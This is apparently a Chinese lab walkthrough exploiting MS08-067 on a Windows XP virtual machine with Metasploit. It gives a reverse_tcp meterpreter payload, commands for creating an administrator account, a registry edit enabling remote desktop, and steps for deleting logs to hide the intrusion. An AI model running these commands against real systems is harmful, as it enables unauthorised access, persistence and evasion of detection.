内网渗透笔记(二):MS08-067漏洞利用

前言:
漏洞介绍:如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。(出自百度百科)
实验环境:虚拟机
攻击者操作系统:Kali Linux 2019.1
靶机操作系统:Window Xp SP2

一、扫描

  • 使用Nnessus扫描靶机后发现存在MS08-067漏洞:

内网渗透笔记(二):MS08-067漏洞利用_第1张图片

二、利用

  • 使用命令:msfdb init初始化msf框架:

内网渗透笔记(二):MS08-067漏洞利用_第2张图片

  • 启动数据库:service postgresql start
  • 使用命令:msfconsole,进入metasploit:

内网渗透笔记(二):MS08-067漏洞利用_第3张图片

  • 查找漏洞脚本:search ms08-067

内网渗透笔记(二):MS08-067漏洞利用_第4张图片

  • 使用漏洞脚本:use exploit/windows/smb/ms08_067_netapi

在这里插入图片描述

  • 设置攻击载荷:set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

  • 查看攻击所需的配置选项:show options

内网渗透笔记(二):MS08-067漏洞利用_第5张图片

  • 设置靶机IP:set RHOSTS 192.168.188.123
  • 设置攻击者IP:set LHOST 192.168.188.121

在这里插入图片描述

  • 查看靶机系统类型:show targets

内网渗透笔记(二):MS08-067漏洞利用_第6张图片

  • 设置靶机系统类型:set target 10

在这里插入图片描述

  • 攻击: exploit

在这里插入图片描述

三、提权

  • shell

内网渗透笔记(二):MS08-067漏洞利用_第7张图片

  • 创建用户:net user test 123 /add

在这里插入图片描述

  • 提权:net localgroup administrators test /add

在这里插入图片描述

  • 删除原来的用户组:net localgroup users test /del

在这里插入图片描述

  • 查看用户: net user test

内网渗透笔记(二):MS08-067漏洞利用_第8张图片

四、入侵

  • 在运行中打开:mstsc,远程连接靶机:
    内网渗透笔记(二):MS08-067漏洞利用_第9张图片
  • 使用刚刚创建好的用户登录:

内网渗透笔记(二):MS08-067漏洞利用_第10张图片

  • 登录成功:

内网渗透笔记(二):MS08-067漏洞利用_第11张图片

五、退隐

  • 删除用户

内网渗透笔记(二):MS08-067漏洞利用_第12张图片

  • 删除日志:

内网渗透笔记(二):MS08-067漏洞利用_第13张图片

溜了,溜了!

PS:若靶机关闭的远程服务则需在shell中执行以下命令:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

在这里插入图片描述

你可能感兴趣的:(安全)